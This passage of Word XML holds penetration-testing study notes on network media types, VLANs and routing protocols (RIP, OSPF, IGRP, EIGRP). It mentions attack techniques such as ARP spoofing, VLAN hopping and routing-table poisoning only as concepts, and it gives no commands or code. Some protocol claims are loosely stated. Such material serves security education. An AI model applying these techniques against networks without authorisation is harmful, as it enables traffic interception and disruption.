      <w:r>
        <w:t xml:space="preserve">B2a - </w:t>
      </w:r>
      <w:r w:rsidRPr="00991A5D">
        <w:t>Varying networks types that could be encountered during a penetration test:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00991A5D" w:rsidRDefault="00991A5D" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00991A5D">
        <w:t>CAT 5 / Fibre</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF2C09" w:rsidRPr="00FF2C09" w:rsidRDefault="00FF2C09" w:rsidP="00FF2C09">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF2C09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Category 5 cable is a twisted pair high signal integrity cable type often referred to as Cat5. Most common used network connection and should not be a problem during an assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF2C09" w:rsidRPr="00FF2C09" w:rsidRDefault="00FF2C09" w:rsidP="00FF2C09">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF2C09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Fibre is used in more secure environments as it is less susceptible to obtaining traffic from emitted signals. Special NICs are required to connect.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00991A5D" w:rsidRDefault="00991A5D" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00991A5D">
        <w:t>10/100/1000baseT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF2C09" w:rsidRPr="00FF2C09" w:rsidRDefault="00FF2C09" w:rsidP="00FF2C09">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FF2C09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>10BASE-T, 100BASE-TX, and 1000BASE-T, running at 10 Mbit/s (also Mbps or Mbs-1), 100 Mbit/s, and 1000 Mbit/s (1 Gbit/s) respectively.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FF2C09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> These three standards all use the same connectors. Higher speed implementations nearly always support the lower speeds as well, so that in most cases different generations of equipment can be freely mixed. They use 8 position modular connectors, usually called RJ45 in the context of Ethernet over twisted pair. The cables usually used are four-pair twisted pair cable (though 10BASE-T and 100BASE-TX only actually require two of them). Each of the three standards support both full-duplex and half-duplex communication. According to the standards, they all operate over distances of up to 100 meters.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00991A5D" w:rsidRDefault="00991A5D" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00991A5D">
        <w:t>Token ring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF2C09" w:rsidRPr="00FF2C09" w:rsidRDefault="00FF2C09" w:rsidP="00FF2C09">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF2C09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Token ring local area network (LAN) technology is a local area network protocol which resides at the data link layer (DLL) of the OSI model. It uses a special three-byte frame called a token that travels around the ring. Token ring frames travel completely around the loop.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF2C09" w:rsidRPr="00FF2C09" w:rsidRDefault="00FF2C09" w:rsidP="00FF2C09">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF2C09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Stations on a token ring LAN are logically organized in a ring topology with data being transmitted sequentially from one ring station to the next with a control token circulating around the ring controlling access. This token passing mechanism is shared by ARCNET, token bus, and FDDI, and has theoretical advantages over the stochastic CSMA/CD of Ethernet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF2C09" w:rsidRPr="00FF2C09" w:rsidRDefault="00FF2C09" w:rsidP="00FF2C09">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF2C09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Physically, a token ring network is wired as a star, with 'hubs' and arms out to each station and the loop going out-and-back through each.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00991A5D" w:rsidRDefault="00991A5D" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00991A5D">
        <w:t>Wireless (802.11)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00991A5D" w:rsidRPr="00FF2C09" w:rsidRDefault="00FF2C09" w:rsidP="00FF2C09">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF2C09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IEEE 802.11 is a set of standards carrying out wireless local area network (WLAN) computer communication in the 2.4, 3.6 and 5 GHz frequency bands. They are created and maintained by the IEEE LAN/MAN Standards Committee (IEEE 802).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00287CAC" w:rsidRDefault="00991A5D" w:rsidP="00287CAC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B2b - </w:t>
      </w:r>
      <w:r w:rsidRPr="00991A5D">
        <w:t>Security implications of shared media, switched media and VLANs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00287CAC" w:rsidRPr="00287CAC" w:rsidRDefault="00FF2C09" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00287CAC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Shared media – traffic sniffing, interception, and injection</w:t>
      </w:r>
      <w:r w:rsidR="00287CAC" w:rsidRPr="00287CAC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. DoS via layer 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00287CAC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00287CAC" w:rsidRPr="00287CAC" w:rsidRDefault="00FF2C09" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00287CAC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Switched media </w:t>
      </w:r>
      <w:r w:rsidR="00287CAC" w:rsidRPr="00287CAC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>elevated the problem of sniffing unless ARP spoofing or routing attacks are undertaken. Broadcast traffic is still seen by all connected parties.</w:t>
      </w:r>
      <w:r w:rsidR="00287CAC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Spanning tree attacks can also cause DoS conditions to occur and maybe used to re-route traffic for interception.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00287CAC" w:rsidRPr="00287CAC" w:rsidRDefault="00287CAC" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00287CAC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00287CAC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VLAN,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00287CAC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a group of hosts with a common set of requirements that communicate as if they were attached to the same broadcast domain, regardless of their physical location. A VLAN has the same attributes as a physical LAN, but it allows for end stations to be grouped together even if they are not located on the same network switch. Network reconfiguration can be done through software instead of physically relocating devices.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> VLAN hopping attacks exist to allow breaking out of a VLAN.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335CD8" w:rsidRDefault="00335CD8" w:rsidP="00FF2C09"/>
    <w:p w:rsidR="00FF2C09" w:rsidRDefault="00FF2C09" w:rsidP="00FF2C09"/>
    <w:p w:rsidR="00335CD8" w:rsidRDefault="00FF2C09" w:rsidP="00991A5D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">B3 </w:t>
      </w:r>
      <w:r w:rsidR="00991A5D">
        <w:t>- Network Routing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335CD8" w:rsidRPr="00991A5D" w:rsidRDefault="00991A5D" w:rsidP="00991A5D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B3a - </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3290">
        <w:t>Network routing protocols RIP, OSPF, and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3290">
        <w:t>IGRP/EIGRP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335CD8" w:rsidRDefault="00335CD8" w:rsidP="00335CD8"/>
    <w:p w:rsidR="00335CD8" w:rsidRPr="00024488" w:rsidRDefault="00991A5D" w:rsidP="00335CD8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00024488">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RIP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024488" w:rsidRPr="00024488" w:rsidRDefault="00024488" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00024488">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Simple request (1) and reply (2) protocol. Requests can be broadcast or unicast (point to point links).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024488" w:rsidRPr="00024488" w:rsidRDefault="00024488" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00024488">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Replys contain full routing table (maybe multiple packets required)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024488" w:rsidRPr="00024488" w:rsidRDefault="00024488" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00024488">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IP is broadcast over UDP Information leakage:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024488" w:rsidRPr="00024488" w:rsidRDefault="00024488" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00024488">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Each routing device broadcasts </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00024488">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>it's</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00024488">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> routing table every 30 seconds.  Routers can be queried for their routing table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024488" w:rsidRPr="00024488" w:rsidRDefault="00024488" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00024488">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>All routing devices on a segment can be discovered by sending a single request for RIP updates. Lack of authentication allows easy poisoning, which can propagate out.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024488" w:rsidRPr="00024488" w:rsidRDefault="00024488" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00024488">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A command of 1 is a REQUEST (send me 1 or all your routes) and 2 (here are my route(s) is a REPLY to a maximum of 25 routes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024488" w:rsidRPr="00024488" w:rsidRDefault="00024488" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00024488">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Routing devices will update their routing tables based on the information supplied by any devices claiming to be a router.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024488" w:rsidRPr="00024488" w:rsidRDefault="00024488" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00024488">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RIP2 adds a simple authentication scheme, but this is a cleartext password and can easily be sniffed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024488" w:rsidRPr="00FB4817" w:rsidRDefault="00024488" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00024488">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Uses “distance vectoring” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>which means that the messages sent by RIP contain vectors of distances (hop counts)</w:t>
      </w:r>
      <w:r w:rsidR="00FB4817">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Each router updates its routing table based on the vector of the distances that it receives from its neighbours. Participants include</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB4817">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> active and passive agents, active routers advertise their routes, passive update themselves from the advertised routes. Only routers run ACTIVE.  Messages contain a list of IP addresses and hop counts to those addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024488" w:rsidRPr="00024488" w:rsidRDefault="00024488" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00024488">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ripquery</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00024488">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool to get routing table.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00991A5D" w:rsidRDefault="00991A5D" w:rsidP="00335CD8"/>
    <w:p w:rsidR="00991A5D" w:rsidRPr="00FB4817" w:rsidRDefault="00991A5D" w:rsidP="00335CD8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB4817">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OSPF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00991A5D" w:rsidRPr="00FB4817" w:rsidRDefault="00140085" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OSPF is a newer </w:t>
      </w:r>
      <w:r w:rsidR="00FB4817" w:rsidRPr="00FB4817">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version to RIP and overcome many of its limitations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB4817" w:rsidRPr="00FB4817" w:rsidRDefault="00FB4817" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB4817">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OSPF is a link state protocol so the router does not exchange distances with its neighbours. Instead each router actively tests the status of its link to each of its neighbours, sends this information to its other neighbours, which then </w:t>
      </w:r>
      <w:r w:rsidR="00140085" w:rsidRPr="00FB4817">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>propagate</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB4817">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> it throughout the autonomous system. Each router takes this link-state information and builds a complete routing table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB4817" w:rsidRPr="00FB4817" w:rsidRDefault="00FB4817" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB4817">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Link-state information converges (becomes stable) faster than distance vector protocols (RIP).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB4817" w:rsidRPr="00FB4817" w:rsidRDefault="00FB4817" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB4817">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication is </w:t>
      </w:r>
      <w:r w:rsidR="00140085">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>required.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB4817">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> There are two forms of authentication allowing for internal segments as well allowing departmental devices to talk to each other. The packets can be sniffed and forged as well.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB4817" w:rsidRDefault="00FB4817" w:rsidP="00335CD8"/>
    <w:p w:rsidR="00991A5D" w:rsidRPr="00E658EC" w:rsidRDefault="00991A5D" w:rsidP="00335CD8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E658EC">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IGRP </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB4817" w:rsidRPr="00E658EC" w:rsidRDefault="00FB4817" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E658EC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Interior Gateway Routing Protocol (IGRP) is a distance vector interior routing protocol (IGP) invented by Cisco. It is used by routers to exchange routing data within an autonomous system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00991A5D" w:rsidRPr="00E658EC" w:rsidRDefault="00FB4817" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E658EC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IGRP is a proprietary protocol. IGRP was created in part to overcome the limitations of RIP (maximum hop count of only 15, and a single routing metric) when used within large networks. IGRP supports multiple metrics for each route, including bandwidth, delay, load, MTU, and reliability; to compare two routes these metrics are combined together into a single metric, using a formula which can be adjusted through the use of pre-set constants. The maximum hop count of IGRP-routed packets is 255 (default 100), and routing updates are broadcast every 90 seconds (by default).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB4817" w:rsidRPr="00E658EC" w:rsidRDefault="00E658EC" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E658EC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Same issues as RIP: not authentication, can spoof routers, obtain routes, update routes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB4817" w:rsidRDefault="00FB4817" w:rsidP="00335CD8"/>
    <w:p w:rsidR="00991A5D" w:rsidRPr="00E658EC" w:rsidRDefault="00991A5D" w:rsidP="00335CD8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E658EC">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EIGRP </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E658EC" w:rsidRPr="00E658EC" w:rsidRDefault="00E658EC" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E658EC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Enhanced Interior Gateway Routing Protocol - (EIGRP) is a Cisco proprietary routing protocol loosely based on their original IGRP. EIGRP is an advanced distance-vector routing protocol, with optimizations to minimize both the routing instability incurred after topology changes, as well as the use of bandwidth and processing power in the router. Routers that support EIGRP will automatically redistribute route information to IGRP </w:t>
      </w:r>
      <w:r w:rsidR="005C2192" w:rsidRPr="00E658EC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>neighbours</w:t>
      </w:r>
